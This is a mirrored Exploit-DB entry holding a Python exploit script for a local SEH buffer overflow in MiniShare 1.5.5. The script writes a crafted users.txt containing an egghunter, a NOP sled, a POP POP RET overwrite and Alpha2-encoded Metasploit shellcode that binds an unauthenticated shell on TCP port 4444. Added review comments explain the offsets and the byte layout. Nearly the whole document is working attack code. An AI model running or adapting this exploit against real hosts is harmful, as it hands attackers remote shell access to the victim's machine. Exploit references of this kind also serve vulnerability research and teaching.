MiniShare 1.5.5 – ‘users.txt’ Local Buffer Overflow (Egghunter)

  • 作者: 0v3r
    日期: 2010-11-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15575/
  • # Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
    # Date: 11/19/2010
    # Author: 0v3r
    # Bug Found By: Chris Gabriel
    # Software Link: http://sourceforge.net/projects/minishare
    # Version: 1.5.5
    # Tested on: Windows XP SP3 EN
    # CVE: N/A
    
    #!/usr/bin/python
    
    # Just rewrote the exploit using an egghunter to stage the payload. The payload is a Metasploit
    # win32_bind shell on TCP 4444: the target starts listening for an unauthenticated connection,
    # so run this only against an isolated lab host.
    # Bug found by Chris Gabriel credit goes to him
    #
    # To exploit just place the users.txt file in the Minishare root directory and run minishare.exe
    
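    # NOTE(review): every component below is a bytes literal and users.txt is
    # written in binary mode, so the file holds exactly these bytes. The
    # original opened the file in text mode ('w'); on Windows that turns any
    # 0x0a into 0x0d 0x0a and shifts every offset after it. This particular
    # payload happens to contain no 0x0a, which is why it survived anyway.

    # 32-byte egghunter. Decoded from the bytes: it advances edx one page at a
    # time, probes each page with int 0x2e (jumping back on return value 5,
    # presumably an access-violation status, to skip unreadable memory), then
    # scans for two consecutive copies of the 4-byte tag "w00t" and jumps to
    # the byte right after them -- i.e. it looks for "w00tw00t".
    egghunter = (
        b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
        b"\x77\x30\x30\x74"  # EGG w00t: the tag the two scasd compares use
        b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
    )

    # Metasploit win32_bind -EXITFUNC=process LPORT=4444, Alpha2-encoded,
    # 696 bytes (generator line from the original author). It opens with a
    # short GetPC stub (jmp/pop/jmp/call); everything after that is
    # alphanumeric. This binds a shell on TCP 4444 of the host that loads the
    # file -- lab use only.
    shellcode = (
        b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        b"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x43"
        b"\x58\x30\x41\x30\x50\x42\x6b\x42\x41\x53\x42\x32\x42\x41\x32\x41"
        b"\x42\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x7a\x49\x4b\x4c\x50"
        b"\x6a\x78\x6b\x72\x6d\x6b\x58\x6b\x49\x79\x6f\x6b\x4f\x49\x6f\x53"
        b"\x50\x4c\x4b\x30\x6c\x56\x44\x46\x44\x6e\x6b\x32\x65\x35\x6c\x4c"
        b"\x4b\x41\x6c\x67\x75\x44\x38\x65\x51\x6a\x4f\x6c\x4b\x50\x4f\x64"
        b"\x58\x6c\x4b\x71\x4f\x75\x70\x74\x41\x5a\x4b\x33\x79\x6c\x4b\x70"
        b"\x34\x4e\x6b\x57\x71\x4a\x4e\x56\x51\x6f\x30\x4f\x69\x4c\x6c\x6c"
        b"\x44\x69\x50\x71\x64\x44\x47\x4b\x71\x7a\x6a\x54\x4d\x63\x31\x58"
        b"\x42\x5a\x4b\x4b\x44\x37\x4b\x30\x54\x65\x74\x37\x58\x70\x75\x38"
        b"\x65\x4e\x6b\x53\x6f\x61\x34\x56\x61\x58\x6b\x30\x66\x6e\x6b\x76"
        b"\x6c\x50\x4b\x6c\x4b\x31\x4f\x75\x4c\x73\x31\x4a\x4b\x53\x33\x46"
        b"\x4c\x4e\x6b\x6c\x49\x32\x4c\x77\x54\x55\x4c\x45\x31\x4b\x73\x45"
        b"\x61\x4b\x6b\x55\x34\x4e\x6b\x37\x33\x30\x30\x4e\x6b\x51\x50\x64"
        b"\x4c\x6c\x4b\x52\x50\x45\x4c\x6e\x4d\x4e\x6b\x31\x50\x37\x78\x73"
        b"\x6e\x50\x68\x6c\x4e\x52\x6e\x74\x4e\x48\x6c\x52\x70\x49\x6f\x48"
        b"\x56\x41\x76\x30\x53\x30\x66\x35\x38\x74\x73\x76\x52\x30\x68\x70"
        b"\x77\x70\x73\x37\x42\x71\x4f\x73\x64\x49\x6f\x58\x50\x53\x58\x58"
        b"\x4b\x7a\x4d\x4b\x4c\x75\x6b\x42\x70\x79\x6f\x4e\x36\x73\x6f\x4e"
        b"\x69\x4d\x35\x55\x36\x4e\x61\x6a\x4d\x66\x68\x47\x72\x30\x55\x50"
        b"\x6a\x64\x42\x39\x6f\x48\x50\x33\x58\x6e\x39\x35\x59\x6a\x55\x4c"
        b"\x6d\x73\x67\x4b\x4f\x4b\x66\x76\x33\x62\x73\x66\x33\x70\x53\x53"
        b"\x63\x57\x33\x56\x33\x61\x53\x53\x63\x6b\x4f\x4a\x70\x51\x76\x63"
        b"\x58\x46\x71\x71\x4c\x72\x46\x63\x63\x6c\x49\x6b\x51\x4f\x65\x61"
        b"\x78\x4d\x74\x44\x5a\x32\x50\x59\x57\x51\x47\x6b\x4f\x58\x56\x72"
        b"\x4a\x32\x30\x50\x51\x42\x75\x6b\x4f\x68\x50\x42\x48\x4f\x54\x4e"
        b"\x4d\x44\x6e\x6d\x39\x33\x67\x4b\x4f\x68\x56\x76\x33\x73\x65\x79"
        b"\x6f\x6e\x30\x73\x58\x6b\x55\x33\x79\x4e\x66\x37\x39\x30\x57\x59"
        b"\x6f\x58\x56\x70\x50\x53\x64\x50\x54\x63\x65\x4b\x4f\x4e\x30\x4f"
        b"\x63\x72\x48\x78\x67\x62\x59\x7a\x66\x44\x39\x42\x77\x79\x6f\x48"
        b"\x56\x66\x35\x4b\x4f\x6a\x70\x30\x66\x50\x6a\x50\x64\x70\x66\x50"
        b"\x68\x71\x73\x62\x4d\x6d\x59\x78\x65\x32\x4a\x52\x70\x56\x39\x54"
        b"\x69\x58\x4c\x6f\x79\x68\x67\x51\x7a\x67\x34\x6f\x79\x6d\x32\x36"
        b"\x51\x6f\x30\x78\x73\x4c\x6a\x4b\x4e\x72\x62\x76\x4d\x4b\x4e\x63"
        b"\x72\x44\x6c\x6c\x53\x6c\x4d\x73\x4a\x75\x68\x6e\x4b\x6e\x4b\x6e"
        b"\x4b\x75\x38\x33\x42\x6b\x4e\x48\x33\x45\x46\x59\x6f\x32\x55\x47"
        b"\x34\x4b\x4f\x49\x46\x63\x6b\x41\x47\x61\x42\x70\x51\x71\x41\x72"
        b"\x71\x52\x4a\x36\x61\x70\x51\x30\x51\x33\x65\x70\x51\x6b\x4f\x4e"
        b"\x30\x51\x78\x6c\x6d\x5a\x79\x57\x75\x78\x4e\x53\x63\x49\x6f\x6a"
        b"\x76\x63\x5a\x49\x6f\x6b\x4f\x56\x57\x6b\x4f\x5a\x70\x6e\x6b\x42"
        b"\x77\x6b\x4c\x4b\x33\x6b\x74\x73\x54\x4b\x4f\x6e\x36\x36\x32\x6b"
        b"\x4f\x68\x50\x35\x38\x31\x6e\x4b\x68\x5a\x42\x44\x33\x72\x73\x6b"
        b"\x4f\x4e\x36\x4b\x4f\x7a\x70\x43"
    )

    # Offset from the start of users.txt to the SEH record: nSEH lands at 386,
    # the handler address at 390. The egghunter sits directly below nSEH.
    SEH_OFFSET = 386

    # NOP sled in front of the egghunter (354 bytes with the 32-byte hunter).
    nops = b"\x90" * (SEH_OFFSET - len(egghunter))
    # need enough NOPs to overwrite the first instance of the egg (original
    # author's note; the exact reason is not explained in the source)
    morenops = b"\x90" * 32
    # 0x004013E7 little-endian: POP POP RET, per the original author. Its high
    # byte is NUL; everything after it must still reach memory for the hunter
    # to find the egg -- the header says this works on XP SP3, verify elsewhere.
    seh = b"\xE7\x13\x40\x00"
    # jmp short -64 (0xC0 is a signed rel8): from 386 + 2 back to offset 324,
    # i.e. into the sled 30 bytes above the egghunter. The two trailing NOPs
    # are padding so nSEH is exactly 4 bytes.
    nseh = b"\xeb\xc0\x90\x90"
    # the key the egghunter looks for: two back-to-back copies of "w00t"
    egg = b"w00tw00t"

    buff = nops + egghunter + nseh + seh + morenops + egg + shellcode

    # [nops][egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode]


    def write_payload(path="users.txt"):
        """Write ``buff`` to *path* byte-for-byte.

        Opens the file in binary mode so no newline translation can alter
        the payload. Raises IOError/OSError if the file cannot be written;
        the caller decides how to report that.
        """
        with open(path, "wb") as fh:
            fh.write(buff)


    def main():
        """Create users.txt in the current directory and print the banner."""
        try:
            write_payload("users.txt")
        except (IOError, OSError):
            print("\t-Oooops! Can't write file 'users.txt'...\n")
            return

        print("\n")
        print("\t---------------------------------------------------------------------------------")
        print("\t| Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version |")
        print("\t---------------------------------------------------------------------------------")
        print("\n")

        print("\t- File 'users.txt' created...")
        print("\t- Place the 'users.txt' file in the Minishare directory and run the program...\n")


    if __name__ == "__main__":
        main()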